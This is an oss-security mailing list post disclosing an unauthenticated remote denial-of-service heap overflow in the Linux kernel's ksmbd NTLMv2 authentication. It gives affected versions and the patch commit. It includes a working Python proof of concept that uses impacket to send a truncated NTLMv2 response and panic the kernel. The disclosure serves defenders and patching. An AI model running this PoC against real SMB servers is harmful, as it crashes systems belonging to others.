Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Message-ID: <CAGakKvz79Ey501w4LwNsMv4zj6LyYdagNyXWOrEt5Kus9xUmuQ@mail.gmail.com>
Date: Wed, 4 Jan 2023 17:35:09 +0100
From: Hrvoje Mišetić <misetichrvoje@...il.com>
To: oss-security@...ts.openwall.com
Cc: will@...lsroot.io
Subject: Linux kernel: Unauthenticated remote DOS in ksmbd NTLMv2 authentication

There is a heap overflow bug in ksmbd_decode_ntlmssp_auth_blob in which nt_len
can be less than CIFS_ENCPWD_SIZE. This results in a negative blen argument
for ksmbd_auth_ntlmv2, where it calls memcpy using blen on memory allocated
by kmalloc(blen + CIFS_CRYPTO_KEY_SIZE). Note that CIFS_ENCPWD_SIZE is 16
and CIFS_CRYPTO_KEY_SIZE is 8. We believe this bug can only result in a
remote DOS and not privilege escalation nor RCE, as the heap overflow occurs
when blen is in range (-8, -1]. The resulting overflow will be too large,
and will lead to a kernel panic. When blen is -8, kmalloc returns
ZERO_SIZE_PTR which will cause a null dereference, but the kernel will oops
and will usually continue to function. This bug has existed since 5.15-rc1
and is still present in the upstream source tree, having just been patched
in https://github.com/cifsd-team/ksmbd and is awaiting merging - the commit
ID is 8824b7af409f51f1316e92e9887c2fd48c0b26d6.

We have tested this bug on Ubuntu 20.04 HWE and 22.04 (both running on
5.15.0-56-generic) and can remotely panic the OS immediately. Any attacker
that can access the ksmbd SMB port can easily cause a kernel panic. Note that
while the attacker has to know a valid username for the service, it does not
need to know the password as the bug happens in the challenge-response phase
of ntlmv2 protocol, making this an unauthenticated attack.

Below is a POC to trigger the bug.
------------------------------------------------------------------------------
#!/usr/bin/python3
from impacket.smbconnection import SMBConnection
import functools
import impacket.ntlm

# using impacket-0.10.0

user = "test"
pw = "test"
domain = "localhost"
address = "127.0.0.1"
target_ip = "127.0.0.1"
port = "445"

def post_function(function, postfunction):
    @functools.wraps(function)
    def run(*args, **kwargs):
        resp = function(*args, **kwargs)
        return postfunction(resp)
    return run

def post_computeResponseNTLMv2_hook(resp):
    return ('A' * 10, resp[1], resp[2])

impacket.ntlm.computeResponseNTLMv2 = post_function(
    impacket.ntlm.computeResponseNTLMv2, post_computeResponseNTLMv2_hook)

smbClient = SMBConnection(address, target_ip, port)
smbClient.login(user, pw, domain)
------------------------------------------------------------------------------
Best,
Hrvoje Mišetić
William Liu

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.